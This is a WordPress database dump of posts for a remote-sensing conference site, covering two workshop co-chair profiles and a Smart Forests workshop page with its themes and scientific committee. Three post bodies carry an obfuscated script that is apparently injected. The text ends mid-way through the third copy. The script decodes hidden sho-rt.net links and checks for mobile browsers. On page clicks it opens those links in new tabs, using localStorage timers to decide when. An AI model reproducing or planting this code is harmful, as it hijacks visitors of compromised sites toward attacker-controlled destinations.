(3045,1,'2022-11-08 19:28:22','2022-11-08 19:28:22','<!-- wp:paragraph -->\n<p>Czech University of Life Sciences Prague, Czech Republic (WGIII-1)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Martin Mokroš,','','publish','closed','closed','','martin-mokros','','','2022-11-08 19:28:24','2022-11-08 19:28:24','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3045',0,'dt_team','',0),
(3046,1,'2022-11-08 19:28:03','2022-11-08 19:28:03','','wss208','','inherit','open','closed','','wss208','','','2022-11-08 19:28:03','2022-11-08 19:28:03','',3045,'https://gsw2023.com/wp-content/uploads/2022/11/wss208.jpg',0,'attachment','image/jpeg',0),
(3047,1,'2022-11-08 19:29:12','2022-11-08 19:29:12','<!-- wp:paragraph -->\n<p>Polytechnic University of Marche, Italy (WGIII-8)</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Roberto Pierdicca','','publish','closed','closed','','roberto-pierdicca','','','2022-11-08 19:29:14','2022-11-08 19:29:14','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3047',0,'dt_team','',0),
(3048,1,'2022-11-08 19:28:52','2022-11-08 19:28:52','','wss209','','inherit','open','closed','','wss209','','','2022-11-08 19:28:52','2022-11-08 19:28:52','',3047,'https://gsw2023.com/wp-content/uploads/2022/11/wss209.jpg',0,'attachment','image/jpeg',0),
(3049,1,'2022-11-08 19:33:11','2022-11-08 19:33:11','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"3050\" img_size=\"450*300\"][vc_separator color=\"green\" style=\"shadow\" border_width=\"5\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]\r\n<h5 style=\"text-align: justify; color: black;\"><strong>This Smart Forests workshop focuses on the assessment and monitoring of forest ecosystems using state-of-the-art Remote Sensing (RS), artificial intelligence (AI), and robotics. Highlighted in this workshop will be emerging topics on data acquisition, pre-processing, information extraction, and forest remote sensing applications to support improved understanding of forest ecosystems, efficient management of forest resources, and multi-scale approaches for forest assessment and monitoring. One of the aims of this workshop will be to encourage discussions on innovative robotic operation of sensors, platforms, and AI powered processing technologies, from the perspectives of practical applications. The workshop also encourages the benchmarking of various data sources and processing methods for extracting key forest metrics and attributes and modelling forest processes.</strong></h5>\r\n<h5><strong>This workshop is jointly organized by</strong></h5>\r\n<ul>\r\n 	<li>\r\n<h5><strong>WGIII/1 Remote Sensing data processing and understanding</strong></h5>\r\n</li>\r\n 	<li>\r\n<h5><strong>WGI/7 Data quality and benchmark of sensors</strong></h5>\r\n</li>\r\n 	<li>\r\n<h5><strong>WGIII/8 Remote sensing for agricultural and natural ecosystems</strong></h5>\r\n</li>\r\n</ul>\r\n[/vc_column_text][vc_separator color=\"green\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"10px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"57\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h2></h2>\r\n<h2>CO-CHAIRS</h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"10px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"58\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]\r\n<h5><strong><u>Themes of the event:</u></strong></h5>\r\n<ul>\r\n 	<li><strong>Advancements in novel sensors, platforms, data generation, and data fusion</strong></li>\r\n 	<li><strong>Automation and real-time system operations</strong></li>\r\n 	<li><strong>Innovation in robotic operation of sensors, platforms, and AI powered processing technologies</strong></li>\r\n 	<li><strong>Machine and deep learning approaches for forest mensuration, reconstruction, and attribute estimation</strong></li>\r\n 	<li><strong>New knowledge and understanding about forest functioning processes</strong></li>\r\n 	<li><strong>Benchmarking as a mechanism to determine the potential and limitations of remote sensing systems and methods</strong></li>\r\n</ul>\r\n&nbsp;\r\n<h5><strong><u>Scientific Committee: </u></strong></h5>\r\n<ul>\r\n 	<li><strong>Xinlian Liang, Wuhan University, China</strong></li>\r\n 	<li><strong>Yunsheng Wang, Finnish Geospatial Research Institute, Finland</strong></li>\r\n 	<li><strong>Francesco Pirotti, University of Padova, Italy</strong></li>\r\n 	<li><strong>Joanne C. White, Canadian Forest Service, Canada</strong></li>\r\n 	<li><strong>Fabian Faßnacht, Freie Universität Berlin, Germany</strong></li>\r\n 	<li><strong>Maria Teresa Melis, University of Cagliari, Italy</strong></li>\r\n 	<li><strong>Weishu Gong, University of Maryland, College Park, USA</strong></li>\r\n 	<li><strong>Megumi Yamashita, Tokyo University of Agriculture and Technology, Japan</strong></li>\r\n 	<li><strong>Jaime Hernandez, University of Chile, Chile</strong></li>\r\n 	<li><strong>Martin Mokroš, Czech University of Life Sciences Prague, Czech Republic</strong></li>\r\n 	<li><strong>Mariana Campos, Finnish Geospatial Research Institute, Finland</strong></li>\r\n 	<li><strong>Roberto Pierdicca, Polytechnic University of Marche, Italy</strong></li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"green\" style=\"shadow\" border_width=\"5\"][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const 